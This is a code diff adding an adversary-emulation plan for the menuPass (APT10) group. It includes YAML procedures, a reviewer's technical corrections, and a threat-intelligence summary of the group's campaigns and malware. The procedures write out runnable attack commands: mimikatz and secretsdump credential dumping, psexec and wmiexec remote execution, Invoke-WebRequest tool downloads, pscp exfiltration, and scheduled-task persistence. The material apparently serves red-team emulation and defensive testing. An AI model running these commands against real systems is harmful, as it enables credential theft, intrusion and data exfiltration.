+ type: URL
+ default: https://download.elifulkerson.com//files/tcping/0.39/tcping.exe
+
+ tcping_remote_ip:
+ description: Hostname or IP to enumerate with tcping.exe
+ type: String
+ default: |
+ 192.0.2.10
+
+ tcping_remote_port:
+ description: Port to enumerate with tcping.exe
+ type: String
+ default: |
+ 445
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ tcping.exe must exist on disk at specified location "#{tcping_local_path}"
+ prereq_command: |
+ if (Test-Path "#{tcping_local_path}\tcping.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{tcping_url}" -OutFile "#{tcping_local_path}\tcping.exe"
+
+ executors:
+ - name: command_prompt
+ command: |
+ "#{tcping_local_path}\tcping.exe" "#{tcping_remote_ip}" "#{tcping_remote_port}"
+
+- id: 814005f7-c8d3-45c8-aea2-45758b2d6e90
+ name: System Network Configuration Discovery
+ description: Scan for nameservers and enumerate NetBIOS sessions
+ tactic: discovery
+ technique:
+ attack_id: T1016
+ name: "System Network Configuration Discovery"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_discovery
+ procedure_step: "3.E"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{nbtscan_local_path}\nbtscan.exe" #{nbt_ip_range}
+ payloads:
+ - nbtscan.exe
+
+ input_arguments:
+ nbtscan_local_path:
+ description: Path of nbtscan.exe
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ nbtscan_url:
+ description: Path to download nbtscan.exe
+ type: URL
+ default: |
+ http://unixwiz.net/tools/nbtscan-1.0.35.exe
+
+ nbt_ip_range:
+ description: IP Range for nbtscan to enumerate
+ type: String
+ default: |
+ 192.0.2.34/24
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ nbtscan.exe must exist on disk at specified location "#{nbtscan_local_path}"
+ prereq_command: |
+ if (Test-Path "#{nbtscan_local_path}\nbtscan.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{nbtscan_url}" -OutFile "#{nbtscan_local_path}\nbtscan.exe"
+
+ executors:
+ - name: command_prompt
+ command: |
+ "#{nbtscan_local_path}\nbtscan.exe" #{nbt_ip_range}
+
+- id: 9d543214-6476-429a-9ca1-cf12233b808c
+ name: System Network Configuration Discovery
+ description: Scan for nameservers and enumerate NetBIOS sessions
+ tactic: discovery
+ technique:
+ attack_id: T1016
+ name: "System Network Configuration Discovery"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_discovery
+ procedure_step: "3.F"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{netsess_local_path}\netsess.exe" #{netsess_remote_ip}
+ payloads:
+ - netsess.exe
+
+ input_arguments:
+ netsess_local_path:
+ description: Path of netsess.exe
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ netsess_url:
+ description: Path to download netsess.exe
+ type: URL
+ default: |
+ http://www.joeware.net/downloads/files/NetSess.zip
+
+ netsess_remote_ip:
+ description: IP or hostname to run netsess.exe against
+ type: String
+ default: |
+ 192.0.2.10
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ netsess.exe must exist on disk at specified location "#{netsess_local_path}"
+ prereq_command: |
+ if (Test-Path "#{netsess_local_path}\netsess.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{netsess_url}" -OutFile "#{netsess_local_path}\NetSess.zip"
+ Expand-Archive "#{netsess_local_path}\NetSess.zip" "#{netsess_local_path}\NetSess" -Force
+ Move-Item "#{netsess_local_path}\NetSess\netsess.exe" "#{netsess_local_path}\netsess.exe"
+ Remove-Item "#{netsess_local_path}\NetSess.zip", "#{netsess_local_path}\NetSess" -Recurse
+
+ executors:
+ - name: command_prompt
+ command: |
+ "#{netsess_local_path}\netsess.exe" #{netsess_remote_ip}
+
+# Scenario 1, Step 4: Credential Access
+
+- id: ffb50e17-cb3c-4424-a4e7-99e3885f22cc
+ name: OS Credential Dumping
+ description: menuPass has used mimikatz.exe to dump credentials locally
+ tactic: credential-access
+ technique:
+ attack_id: T1003.001
+ name: "OS Credential Dumping: LSASS Memory"
+ cti_source: https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf
+ procedure_group: procedure_cred_access
+ procedure_step: "4.A"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{mimikatz_local_path}\#{mimikatz_arch}\mimikatz.exe" "#{mimikatz_module}"
+ payloads:
+ - mimikatz.exe
+
+ input_arguments:
+ mimikatz_local_path:
+ description: Path of mimikatz
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ mimikatz_arch:
+ description: Architecture folder (Win32 or x64)
+ type: String
+ default: x64
+
+ mimikatz_url:
+ description: URL to download mimikatz.exe zip
+ type: URL
+ default: https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200917/mimikatz_trunk.zip
+
+ mimikatz_module:
+ description: Mimikatz module
+ type: String
+ default: |
+ sekurlsa::logonpasswords
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ mimikatz.exe must exist on disk at specified location "#{mimikatz_local_path}"
+ prereq_command: |
+ if (Test-Path "#{mimikatz_local_path}\#{mimikatz_arch}\mimikatz.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{mimikatz_url}" -OutFile "#{mimikatz_local_path}\mimikatz.zip"
+ Expand-Archive "#{mimikatz_local_path}\mimikatz.zip" "#{mimikatz_local_path}" -Force
+ Remove-Item "#{mimikatz_local_path}\mimikatz.zip" -Force
+
+ executors:
+ - name: command_prompt
+ elevation_required: true
+ command: |
+ "#{mimikatz_local_path}\#{mimikatz_arch}\mimikatz.exe" "#{mimikatz_module}"
+
+- id: fe3d4de1-50bf-4241-9546-72dc757e696f
+ name: OS Credential Dumping
+ description: menuPass has used secretsdump.exe to dump credentials remotely
+ tactic: credential-access
+ technique:
+ attack_id: T1003.002
+ name: "OS Credential Dumping: Security Account Manager"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_cred_access
+ procedure_step: "4.B"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{secretsdump_local_path}\secretsdump.exe" "#{secretsdump_domain}"/"#{secretsdump_user}":"#{secretsdump_pass}"@"#{secretsdump_remote_host}"
+ payloads:
+ - secretsdump.exe
+
+ input_arguments:
+ secretsdump_local_path:
+ description: Path of secretsdump.exe
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ secretsdump_url:
+ description: URL to download secretsdump.exe binary
+ type: URL
+ default: https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/secretsdump_windows.exe
+
+ secretsdump_domain:
+ description: Domain for secretsdump.exe command
+ type: String
+ default: DOMAIN
+
+ secretsdump_user:
+ description: User for secretsdump.exe command
+ type: String
+ default: Administrator
+
+ secretsdump_pass:
+ description: Password for secretsdump.exe command
+ type: String
+ default: Password123
+
+ secretsdump_remote_host:
+ description: Hostname or IP for secretsdump.exe connection
+ type: String
+ default: 192.0.2.10
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ secretsdump.exe must exist on disk at specified location "#{secretsdump_local_path}"
+ prereq_command: |
+ if (Test-Path "#{secretsdump_local_path}\secretsdump.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{secretsdump_url}" -OutFile "#{secretsdump_local_path}\secretsdump.exe"
+
+ executors:
+ - name: command_prompt
+ elevation_required: true
+ command: |
+ "#{secretsdump_local_path}\secretsdump.exe" "#{secretsdump_domain}"/"#{secretsdump_user}":"#{secretsdump_pass}"@"#{secretsdump_remote_host}"
+
+# Scenario 1, Step 5: Lateral Movement
+
+- id: 4b1748e5-532c-453c-b195-557ce5550fef
+ name: Service Execution
+ description: Using compiled psexec.py to achieve remote code execution
+ tactic: lateral-movement
+ technique:
+ attack_id: T1569.002
+ name: "System Services: Service Execution"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_lateral_movement
+ procedure_step: "5.A"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{psexec_local_path}\psexec.exe" "#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"
+ payloads:
+ - psexec.exe
+
+ input_arguments:
+ psexec_local_path:
+ description: Path of psexec.exe
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ psexec_url:
+ description: URL to download psexec.exe binary
+ type: URL
+ default: https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/psexec_windows.exe
+
+ psexec_user:
+ description: User for psexec authentication
+ type: String
+ default: |
+ Administrator
+
+ psexec_password:
+ description: Password for psexec authentication
+ type: String
+ default: |
+ badpassword123
+
+ psexec_remote_host:
+ description: IP or hostname for PsExec connection
+ type: String
+ default: |
+ 192.0.2.10
+
+ psexec_cmd:
+ description: PsExec argument for specifying executable
+ type: String
+ default: |
+ -c d.exe
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ psexec.exe must exist on disk at specified location "#{psexec_local_path}"
+ prereq_command: |
+ if (Test-Path "#{psexec_local_path}\psexec.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{psexec_url}" -OutFile "#{psexec_local_path}\psexec.exe"
+
+ executors:
+ - name: command_prompt
+ command: |
+ "#{psexec_local_path}\psexec.exe" "#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"
+
+# Scenario 1, Step 6: Collection
+
+- id: 160a1e0f-0f9b-49bb-a0fe-7e362b51737f
+ name: Archive Collected Data - Archive via Utility
+ description: Compress and stage data for exfiltration
+ tactic: collection
+ technique:
+ attack_id: T1560.001
+ name: "Archive Collected Data - Archive via Utility"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ procedure_group: procedure_collection
+ procedure_step: "6.A"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ rar.exe a "#{rar_archive_name}" "#{rar_files}"
+ payloads:
+ - rar.exe
+
+ input_arguments:
+ rar_archive_name:
+ description: Name of rar archive
+ type: String
+ default: |
+ ss.rar
+
+ rar_files:
+ description: Path to files to compress
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ executors:
+ - name: command_prompt
+ command: |
+ rar.exe a "#{rar_archive_name}" "#{rar_files}"
+
+- id: b4fa6d2e-ed9c-4a86-81aa-19331983fe0d
+ name: Recycle Bin Staging
+ description: menuPass actors are thought to have staged archives in the Recycle Bin for exfiltration.
+ tactic: collection
+ technique:
+ attack_id: T1074.001
+ name: "Local Data Staging"
+ cti_source: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ procedure_group: procedure_collection
+ procedure_step: "6.B"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ copy #{copy_filename} "C:\$Recycle.Bin\"
+
+ input_arguments:
+ copy_filename:
+ description: Name of file to copy
+ type: String
+ default: |
+ aa.rar
+
+ executors:
+ - name: command_prompt
+ command: |
+ copy #{copy_filename} "C:\$Recycle.Bin\"
+
+# Scenario 1, Step 7: Exfiltration
+
+- id: ea4bc858-ba13-4f97-9df3-c543d8f3d44c
+ name: Transfer Data to Cloud Account
+ description: Exfil data to cloud account
+ tactic: exfiltration
+ technique:
+ attack_id: T1537
+ name: "Transfer Data to Cloud Account"
+ cti_source: https://pwc.co.uk/cyber-secrity/pdf/cloud-hopper-report-final-v4.pdf
+ procedure_group: procedure_exfiltration
+ procedure_step: "7.A"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ "#{pscp_local_path}\pscp.exe" "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"
+ payloads:
+ - pscp.exe
+
+ input_arguments:
+ pscp_url:
+ description: Path to download pscp.exe
+ type: URL
+ default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
+
+ pscp_local_path:
+ description: Local path to pscp.exe
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ pscp_exfil_files:
+ description: Path of files to be sent with pscp
+ type: Path
+ default: |
+ C:\Windows\Temp\exfil
+
+ pscp_user:
+ description: Remote username
+ type: String
+ default: |
+ Administrator
+
+ pscp_server:
+ description: IP or hostname of remote host to connect via pscp
+ type: String
+ default: |
+ 192.0.2.10
+
+ pscp_drop_location:
+ description: Path where to download pscp.exe
+ type: Path
+ default: |
+ temp
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ pscp.exe must exist on disk at specified location "#{pscp_local_path}"
+ prereq_command: |
+ if (Test-Path "#{pscp_local_path}\pscp.exe") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{pscp_url}" -OutFile "#{pscp_local_path}\pscp.exe"
+
+ executors:
+ - name: command_prompt
+ command: |
+ "#{pscp_local_path}\pscp.exe" "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"
+
+
+# Scenario 1, Step 8 - Execution
+
+- id: 8911d502-747a-4155-adcd-b03a1f284ee7
+ name: Windows Management Instrumentation
+ description: Using wmiexec.vbs to execute tactical malware
+ tactic: execution
+ technique:
+ attack_id: T1047
+ name: "Windows Management Instrumentation"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_execution
+ procedure_step: "8.A"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ cscript.exe "#{wmiexec_local_path}\wmiexec.vbs" /shell "#{wmiexec_remote_host}"
+ payloads:
+ - wmiexec.vbs
+
+ input_arguments:
+ wmiexec_local_path:
+ description: Path of wmiexec.vbs
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ wmiexec_url:
+ description: Path to download wmiexec.vbs
+ type: URL
+ default: |
+ https://raw.githubusercontent.com/Twi1ight/AD-Pentest-Script/master/wmiexec.vbs
+
+ wmiexec_remote_host:
+ description: Hostname or IP of remote host
+ type: String
+ default: |
+ 192.0.2.10
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ wmiexec.vbs must be located at "#{wmiexec_local_path}"
+ prereq_command: |
+ if (Test-Path "#{wmiexec_local_path}\wmiexec.vbs") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "#{wmiexec_url}" -OutFile "#{wmiexec_local_path}\wmiexec.vbs"
+
+ executors:
+ - name: command_prompt
+ command: |
+ cscript.exe "#{wmiexec_local_path}\wmiexec.vbs" /shell "#{wmiexec_remote_host}"
+
+
+# Scenario 1, Step 9: Persistence
+
+- id: 236d1357-64f9-4a98-afc1-bccaa89aba8c
+ name: Scheduled Task Persistence
+ description: menuPass is reported to have used scheduled tasks to persist
+ tactic: persistence
+ technique:
+ attack_id: T1553.005
+ name: "Scheduled Task/Job: Scheduled Task"
+ cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ procedure_group: procedure_persistence
+ procedure_step: "7.1"
+ platforms:
+ windows:
+ cmd:
+ command: |
+ schtasks /create /sc "#{schtask_schedule}" /tn "#{schtask_taskname}" /tr "#{schtask_taskrun}" /ru "#{schtask_username}"
+
+ input_arguments:
+ schtask_schedule:
+ description: Value that specifies the schedule frequency. (MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONLOGON, ONIDLE, and ONEVENT)
+ type: String
+ default: |
+ DAILY
+
+ schtask_taskname:
+ description: A value that specifies a name which uniquely identifies the scheduled task.
+ type: String
+ default: |
+ taskname
+
+ schtask_taskrun:
+ description: A value that specifies the path and file name of the task to be run at the scheduled time.
+ type: Path
+ default: |
+ C:\Windows\Temp
+
+ schtask_username:
+ description: A value that specifies the user context under which the task runs.
+ type: String
+ default: |
+ username
+
+ executors:
+ - name: command_prompt
+ elevation_required: true
+ command: |
+ schtasks /create /sc "#{schtask_schedule}" /tn "#{schtask_taskname}" /tr "#{schtask_taskrun}" /ru "#{schtask_username}"
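Review bot: the technique ID on the Scheduled Task persistence procedure is wrong. `attack_id: T1553.005` is Subvert Trust Controls: Mark-of-the-Web Bypass, while the name on the next line, "Scheduled Task/Job: Scheduled Task", is T1053.005, which is also the ID the Intelligence Summary added in this same PR cites for the group's scheduled-task persistence. The same step carries `procedure_step: "7.1"` under the "Step 9: Persistence" heading, where every other step uses the "N.A"/"N.B" form, so it should read "9.A". A few more points in this hunk. The `default: |` block scalars (for example `C:\Windows\Temp`, `-c d.exe`, `192.0.2.10`) keep a trailing newline under YAML's default clip chomping, so every substituted path, host and argument ends in a newline when the command is assembled; use plain scalars as the secretsdump_domain and secretsdump_user defaults already do, or `|-`. In the psexec executor the whole of `"#{psexec_cmd}"` is quoted as one argument, so the default `-c d.exe` reaches the binary as a single token rather than as the `-c` flag followed by a path, and nothing in the plan stages `d.exe` on the host first; either drop the quotes or split the flag and the file into separate arguments and add a dependency for the file. The cti_source on the T1537 step is misspelled: `https://pwc.co.uk/cyber-secrity/pdf/cloud-hopper-report-final-v4.pdf`. The pscp_drop_location description says "Path where to download pscp.exe", but the argument is the remote directory the files are copied into; also, as written pscp will stop to prompt for a password and for host-key confirmation, so an unattended executor needs `-pw` (or key auth) plus `-hostkey` or `-batch`. The rar.exe step lists `rar.exe` as a payload but, unlike the neighbouring steps, has no dependency or get_prereq_command and calls `rar.exe` bare, so it depends on PATH; its default archive `ss.rar` also does not match the `aa.rar` the Recycle Bin step copies, so the two collection steps will not chain with defaults. The schtasks step passes `/ru "#{schtask_username}"` without `/rp`, which makes schtasks prompt for that account's password for anything other than SYSTEM, and the default `/tr` value `C:\Windows\Temp` is a directory, not a program to run. Finally, `wmiexec_url` fetches from a third-party repository at `master` rather than a pinned commit, so the content the prereq downloads can change underneath the plan; pin a commit hash the way the impacket binaries are at least pinned to a release tag.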
diff --git a/menuPass/Intelligence_Summary.md b/menuPass/Intelligence_Summary.md
new file mode 100644
index 00000000..20c87264
--- /dev/null
+++ b/menuPass/Intelligence_Summary.md
@@ -0,0 +1,183 @@
+# menuPass Intelligence Summary
+
+## ATT&CK Group ID: [G0045](https://attack.mitre.org/groups/G0045/)
+
+## Associated Groups: [Stone Panda](https://crowdstrike.com/blog/two-birds-one-stone-panda/), [APT10](https://fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html), [Red Apollo](https://justice.gov/opa/press-release/file/1121706/download), [CVNX](https://fbi.gov/wanted/cyber/zhu-hua), [HOGFISH](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf), [BRONZE RIVERSIDE](https://secureworks.com/research/threat-profiles/bronze-riverside)
+
+**Objectives:** menuPass is thought to be motivated by collection objectives that align with Chinese national interests. Their operational objective over time and across a diverse target set appears to be intellectual property theft. A 2018 indictment issued by the United States Department of Justice suggests at least a portion of the activity attributed to menuPass was carried out by two employees of Huaying Haitai Science and Technology Development Company. These individuals are believed to have been working at the behest of the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau.[6](https://justice.gov/opa/press-release/file/1121706/download) [14](https://crowdstrike.com/blog/two-birds-one-stone-panda/) [17](https://intrusiontruth.wordpress.com/2018/08/15/apt10-was-managed-by-the-tianjin-bureau-of-the-chinese-ministry-of-state-security/) menuPass is reported to have been active since at least 2009 but may have been operating as early as 2006.[6](https://justice.gov/opa/press-release/file/1121706/download)
+
+**Target Industries:** The indicted menuPass actors were charged with one count each of conspiracy to commit computer intrusions. The document discloses two campaigns attributed to these actors. The first campaign is reported to have begun in 2006, and is thought to have been motivated by technology theft. These efforts were directed against NASA's Jet Propulsion Laboratory (JPL) and organizations in aviation, space, communications, manufacturing, maritime, oil and gas.[6](https://justice.gov/opa/press-release/file/1121706/download)
+
+The second campaign, is thought to have begun in 2014 and initially targeted Managed Service Providers (MSPs). The group targeted MSPs for the purpose of pivoting into MSP customer networks. This campaign resulted in the compromise of organizations in banking and finance, telecommunications, medical equipment, manufacturing, consulting, healthcare, biotechnology, automotive, oil, gas exploration, and mining.[6](https://justice.gov/opa/press-release/file/1121706/download)
+
+In addition to the two campaigns listed in the 2018 indictment, menuPass actors are reported to have targeted public and private sector entities in at least 12 other countries. Aside from targeting organizations based in the United States, the group is perhaps best known for its extensive and sustained efforts against Japanese institutions. menuPass actors are reported to have targeted public and private interests alike, to include public policy organizations, educational institutions, media, and technology firms.[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+Researchers have suggested menuPass targeting may broadly align with China’s strategic objectives as stated in the Five-Year Plan (FYP) / Made in China 2025 Plan.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) menuPass is thought to have pursued these objectives over disparate but concurrent campaigns. From 2016 – 2018, menuPass actors are thought to have been engaged in operations directed against various MSPs, Japanese institutions, manufacturing companies in India and Europe, a mining company in South America, a U.S. based law firm, an international apparel company, and several other targets in Europe, the Middle East, and Africa.[1](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/) [4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf) [9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) [13](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor)
+
+**Operations:** menuPass actors are reported to have pursued initial access by spearphishing to achieve user execution ([T1204.002](https://attack.mitre.org/techniques/T1204/002/)).[1](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf) [9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) [20](https://lac.co.jp/lacwatch/people/20170223_001224.html) [21](https://lac.co.jp/lacwatch/people/20180521_001638.html) menuPass spearphishing attempts generally assume a pretext that would be of interest to the intended target and are reported to have featured password protected Microsoft Word documents embedded with VBA macros ([T1566.001](https://attack.mitre.org/techniques/T1566/001/)), an executable attachment that exploits a vulnerability ([T1566.001](https://attack.mitre.org/techniques/T1566/001/)), or a link that points to a payload server ([T1566.002](https://attack.mitre.org/techniques/T1566/002/)).[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) Once inside the target organization, menuPass actors have used a variety of open-source, modified open-source, and custom tools to perform discovery, escalate privileges, access credentials, move laterally, and exfiltrate data.
+
+"Operation Cloud Hopper," was a long-term persistent effort to compromise MSPs with the intent of abusing trust relationships in order to pivot into customer networks.([T1199](https://attack.mitre.org/techniques/T1199/)).[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) menuPass actors are thought to have achieved initial access to MSP networks by spearphishing. From the MSP networks, menuPass actors are reported to have used legitimate but compromised local accounts ([T1078.003](https://attack.mitre.org/techniques/T1078/003/)) coupled with legitimate remote access applications ([T1133](https://attack.mitre.org/techniques/T1133/)) to access customer environments.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) From this initial point of presence, menuPass actors are reported to have used administrative tools native to the Windows environment to download an operational toolkit from an attacker controlled server. This toolkit enabled the pursuit of tactical objectives with the operational intent of exfiltrating intellectual property. This activity will serve as the basis for Scenario 1.
+
+menuPass is also reported to have engaged in phishing campaigns, the most prolific of which were directed against Japanese institutions. Successful compromise resulted in the deployment of menuPass malware to the victim network and the establishment of command and control. menuPass malware has been categorized by the manner in which it was employed by menuPass actors and not necessarily by the malware's inherent functionality. PWC categorized menuPass malware as tactical or sustained.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) Tactical malware is usually deployed during delivery, or upon initial access, and is intended to perform lightweight tasks, such as discovery and execution.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) Sustained malware is often modular and has an enhanced set of features.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) Sustained malware is deployed to specific systems to facilitate a long-term point of presence.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) menuPass is reported to have leveraged the access facilitated by its malware to pursue operational objectives. This activity will serve as the basis for Scenario 2.
+
+## Tactical Malware
+
+Name | Associated Names | Availability | Emulation Notes|
+|:---:|:---|:---|:---|
+[ChChes](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/) ([S0144](https://attack.mitre.org/software/S0144/))| [HAYMAKER](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html), [Scorpian](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|Custom| Has been injected using PowerSploit[29](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html)|
+[EvilGrab](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) ([S0152](https://attack.mitre.org/software/S0152/))| Vidgrab, Grabber| Custom|Used to "grab" audio, video, and screenshots. Also capable of lightweight reconnaissance tasks[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+[Koadic](https://www.trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) ([S0250](https://attack.mitre.org/software/S0250/))| |Publicly available | Delivered via phishing and used to download and execute ANEL[16](https://www.trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)|
+[RedLeaves](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) ([S0153](https://attack.mitre.org/software/S0153/))| [BUGJUICE](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html), [Trochilus](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)| Custom| Operates like publicly available Trochilus[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)| Has been deployed to DC to copy NTDS.DIT[10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)
+[SNUGRIDE](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) ([S0159](https://attack.mitre.org/software/S0159/))| |Custom|Capable of lightweight tasks and persistence. Communicates over HTTP requests[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)|
+[UPPERCUT](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf) ([S0275](https://attack.mitre.org/software/S0275/))|[ANEL](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf) |Custom| Often deployed via phishing[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)|
+
+---
+## Sustained Malware
+Name | Associated Names| Availability | Emulation Notes|
+|:---:|:---|:---|:---|
+[Poison Ivy](https://fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf) ([S0012](https://attack.mitre.org/software/S0012/))|Darkmoon|Custom|menuPass is reported to have deployed Poison Ivy as early as 2009 and as recently as 2014[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+[PlugX](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) ([S0013](https://attack.mitre.org/software/S0013/))| [SOGU](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) |Custom|Typically deployed as a self-exttracting archive[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+[QuasarRAT](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor) ([S0262](https://attack.mitre.org/software/S0262/))|CinaRAT, Yggdrasil|Publicly available|A publicly available RAT typically deployed with a custom .NET loader[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+---
+
